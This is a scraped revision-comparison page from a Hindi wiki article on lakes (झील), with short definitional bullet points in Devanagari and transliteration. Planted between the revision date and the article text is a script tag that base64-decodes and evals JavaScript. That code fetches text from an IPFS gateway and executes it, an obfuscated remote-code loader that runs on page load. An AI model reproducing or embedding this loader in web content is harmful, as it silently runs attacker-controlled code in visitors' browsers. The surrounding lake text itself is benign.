Difference between revisions of "झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{incomplete}}
+
{{आधार}}
 
*झील [[जल]] का वह स्थिर भाग है जो चारो तरफ से स्थलखंडों से घिरा होता है।  
 
*झील [[जल]] का वह स्थिर भाग है जो चारो तरफ से स्थलखंडों से घिरा होता है।  
 
*झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है।  
 
*झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है।  

Revision as of 14:25, 20 July 2010

32px yah lekh ki adhar avastha hi hai, ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • jhil jal ka vah sthir bhag hai jo charo taraph se sthalakhandoan se ghira hota hai.
  • jhil ki doosari visheshata usaka sthayitv hai. samany roop se jhil bhootal ke ve vistrit gaddhe haian jinamean jal bhara hota hai.
  • jhiloan ka jal prayah sthir hota hai. jhiloan ki ek mahattvapoorn visheshata unaka kharapan hota hai lekin anek jhilean mithe pani ki bhi hoti haian.
  • jhilean bhoopatal ke kisi bhi bhag par ho sakati haian. ye uchch parvatoan par milati haian, patharoan aur maidanoan par bhi milati haian tatha sthal par sagar tal se niche bhi paee jati haian.